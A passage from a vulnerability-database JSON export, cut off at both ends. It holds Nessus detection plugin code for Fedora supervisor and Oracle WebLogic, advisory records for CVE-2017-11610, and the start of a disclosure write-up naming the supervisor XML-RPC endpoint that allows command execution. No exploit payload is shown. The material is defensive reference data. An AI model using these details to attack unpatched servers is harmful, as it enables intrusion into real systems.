exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"supervisor-3.1.4-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"supervisor\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-19T15:44:31", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by a remote code execution vulnerability in the Oracle Fusion Middleware Console subcomponent. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to execute arbitrary commands.\n\nNo reliable remote exploit has been published for Oracle WebLogic Server 10.3.6.X or 12.1.3.X, so Nessus will not be able to determine if the remote server is affected or not for these versions.", "cvss3": {}, "published": "2020-11-06T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server RCE (CVE-2020-14882)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14882"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CVE-2020-14882.NBIN", "href": "https://www.tenable.com/plugins/nessus/142594", "sourceData": "Binary data oracle_weblogic_server_CVE-2020-14882.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-17T14:57:18", "description": "The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in the October 2020 CPU advisory.\n\n - An unspecified vulnerability exists in the Console component. An unauthenticated, remote attacker with network access via HTTP can exploit this issue to compromise the server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14750, CVE-2020-14882)\n\n - An unspecified vulnerability exists in the Core component. An unauthenticated, remote attacker can exploit this issue via the IIOP and T3 protocols to compromise the server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14859)\n\n - An unspecified vulnerability exists in the Core component. An unauthenticated, remote attacker can exploit this issue via the IIOP protocol to compromise the server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14841)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-22T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Oct 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-17267", "CVE-2020-11022", "CVE-2020-14750", "CVE-2020-14757", "CVE-2020-14820", "CVE-2020-14825", "CVE-2020-14841", "CVE-2020-14859", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-9488"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2020.NASL", "href": "https://www.tenable.com/plugins/nessus/141807", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141807);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\n \"CVE-2019-17267\",\n \"CVE-2020-9488\",\n \"CVE-2020-11022\",\n \"CVE-2020-14750\",\n \"CVE-2020-14757\",\n \"CVE-2020-14820\",\n \"CVE-2020-14825\",\n \"CVE-2020-14841\",\n \"CVE-2020-14859\",\n \"CVE-2020-14882\",\n \"CVE-2020-14883\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0478\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0132\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Oct 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in\nthe October 2020 CPU advisory.\n\n - An unspecified vulnerability exists in the Console component. An unauthenticated, remote attacker with\n network access via HTTP can exploit this issue to compromise the server. Successful attacks of this \n vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14750, CVE-2020-14882)\n\n - An unspecified vulnerability exists in the Core component. An unauthenticated, remote attacker can exploit \n this issue via the IIOP and T3 protocols to compromise the server. Successful attacks of this\n vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14859)\n\n - An unspecified vulnerability exists in the Core component. An unauthenticated, remote attacker can exploit\n this issue via the IIOP protocol to compromise the server. Successful attacks of this vulnerability can\n result in takeover of Oracle WebLogic Server. (CVE-2020-14841)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpuoct2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2020.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/alert-cve-2020-14750.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2020 Oracle Critical Patch Update advisory and the Oracle Security\nAlert advisory for CVE-2020-14750.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14882\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic Server Administration Console Handle RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_ports(\"installed_sw/Oracle WebLogic Server\", \"installed_sw/Oracle Data Integrator Embedded Weblogic Server\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\napp_name = 'Oracle WebLogic Server';\napp_name_odi = 'Oracle Data Integrator Embedded Weblogic Server';\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\nnormal_installs = get_installs(app_name:app_name, port:port, exit_if_not_found:FALSE);\nodi_installs = get_installs(app_name:app_name_odi, port:port, exit_if_not_found:FALSE);\nall_installs = {};\n\nif (odi_installs[0] == IF_OK)\n all_installs = odi_installs[1];\n\nif (normal_installs[0] == IF_OK)\n all_installs = make_list2(all_installs, normal_installs[1]);\n\nif (empty(all_installs))\n audit(AUDIT_NOT_INST, app_name + ' or ' + app_name_odi);\n\ninstall = branch(all_installs);\nversion = install['version'];\n\nfix = NULL;\nfix_ver = NULL;\n\nif (version =~ \"^14\\.1\\.1\\.0($|[^0-9])\")\n{\n fix_ver = '14.1.1.0.200930';\n fix = make_list('31957062', '32097180');\n}\nelse if (version =~ \"^12\\.2\\.1\\.4($|[^0-9])\")\n{\n fix_ver = '12.2.1.4.201001';\n fix = make_list('31960985', '32097167');\n}\nelse if (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = '12.2.1.3.201001';\n fix = make_list('31961038', '32097173');\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = '12.1.3.0.201020';\n fix = make_list('31656851', '32097177');\n}\nelse if (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = '10.3.6.0.201020';\n fix = make_list('NA7A', 'KYRS');\n}\n\nif (isnull(fix_ver) || ver_compare(ver:version, fix:fix_ver, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install['path']);\n\nelse {\n report =\n '\\n Oracle Home : ' + install['Oracle Home'] +\n '\\n Install path : ' + install['path'] +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:', ', fix);\n security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "debiancve": [{"lastseen": "2023-09-29T11:03:46", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T14:29:00", "type": "debiancve", "title": "CVE-2017-11610", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-23T14:29:00", "id": "DEBIANCVE:CVE-2017-11610", "href": "https://security-tracker.debian.org/tracker/CVE-2017-11610", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "github": [{"lastseen": "2023-09-27T22:12:21", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:42:26", "type": "github", "title": "Incorrect Default Permissions in Supervisor", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2023-01-27T05:02:33", "id": "GHSA-X7C8-4X3H-874W", "href": "https://github.com/advisories/GHSA-x7c8-4x3h-874w", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T13:12:19", "description": "Supervisor is vulnerable to remote code execution (RCE) attacks. A malicious user can send a malicious XMLRPC request to the application to inject and execute arbitrary commands at daemon level privilege.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-15T09:19:14", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2019-10-03T07:06:18", "id": "VERACODE:12590", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-12590/summary", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T16:10:20", "description": "Supervisor is vulnerable to remote code execution (RCE) attacks. A malicious user can send a malicious XMLRPC request to the application to inject and execute arbitrary commands at daemon level privilege.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-24T22:39:07", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2019-10-03T07:06:18", "id": "VERACODE:4649", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-4649/summary", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "The supervisor is a client/server system that allows its users to control a number of processes on UNIX-like operating systems. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-07T20:18:38", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: supervisor-3.1.4-1.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-07T20:18:38", "id": "FEDORA:4F26D6017118", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "The supervisor is a client/server system that allows its users to control a number of processes on UNIX-like operating systems. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-07T21:23:15", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: supervisor-3.2.4-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-07T21:23:15", "id": "FEDORA:7D239601DD9B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "The supervisor is a client/server system that allows its users to control a number of processes on UNIX-like operating systems. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-07T17:22:19", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: supervisor-3.3.3-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-07T17:22:19", "id": "FEDORA:7151D601710E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4GMSCGMM477N64Z3BM34RWYBGSLK466B/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:20:25", "description": "\nA vulnerability has been found in supervisor, a system for controlling\nprocess state, where an authenticated client can send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands\non the server. The commands will be run as the same user as supervisord.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n3.0a8-1.1+deb7u2.\n\n\nWe recommend that you upgrade your supervisor packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-31T00:00:00", "type": "osv", "title": "supervisor - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2022-07-21T05:51:45", "id": "OSV:DLA-1047-1", "href": "https://osv.dev/vulnerability/DLA-1047-1", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-03-07T05:20:56", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:42:26", "type": "osv", "title": "Incorrect Default Permissions in Supervisor", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2023-03-07T05:20:54", "id": "OSV:GHSA-X7C8-4X3H-874W", "href": "https://osv.dev/vulnerability/GHSA-x7c8-4x3h-874w", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T01:08:52", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-23T14:29:00", "type": "osv", "title": "PYSEC-2017-41", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2021-07-05T00:01:27", "id": "OSV:PYSEC-2017-41", "href": "https://osv.dev/vulnerability/PYSEC-2017-41", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:56:42", "description": "### Vulnerability Summary\r\nThe following advisory describes an authenticated remote code execution vulnerability in Supervisor version 3.1.2 and Supervisor version 3.3.2.\r\n\r\nSupervisor is a client/server system that allows its users to monitor and control a number of processes on UNIX-like operating systems \u2013 used to control processes related to a project or a customer, and is meant to start like any other program at boot time.\r\n\r\n### Credit\r\nAn independent security researcher, Calum Hutton, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\n### Vendor response\r\nThe vendor has released patches to address this vulnerability.\r\n\r\nFor more information: https://github.com/Supervisor/supervisor/issues/964\r\n\r\nCVE: CVE-2017-11610\r\n\r\n\r\n### Vulnerability details\r\nSupervisord provides a web server, running on port 9001, that allows users to manage their processes using a web interface. When this server is enabled, an XMLRPC server is also enabled at :9001/RPC2\r\n\r\nAny user with access to the web interface can also send commands to the XMLRPC endpoint. Authentication may be required for access, and is determined in the config file.\r\n\r\nIt is possible to abuse the XMLRPC server to issue malicious commands (which are somewhat restricted) at the OS level as the root user, because of a lack of validation on requested XMLRPC methods.\r\n\r\nThere are two allowed namespaces for the allowed XMLRPC methods, system and supervisor, mapped to https://github.com/Supervisor/supervisor/blob/3.3.2/supervisor/xmlrpc.py#L174\r\nand https://github.com/Supervisor/supervisor/blob/3.3.2/supervisor/xmlrpc.py#L174,\r\nrespectively. Allowed methods include (snippet of the XML response to 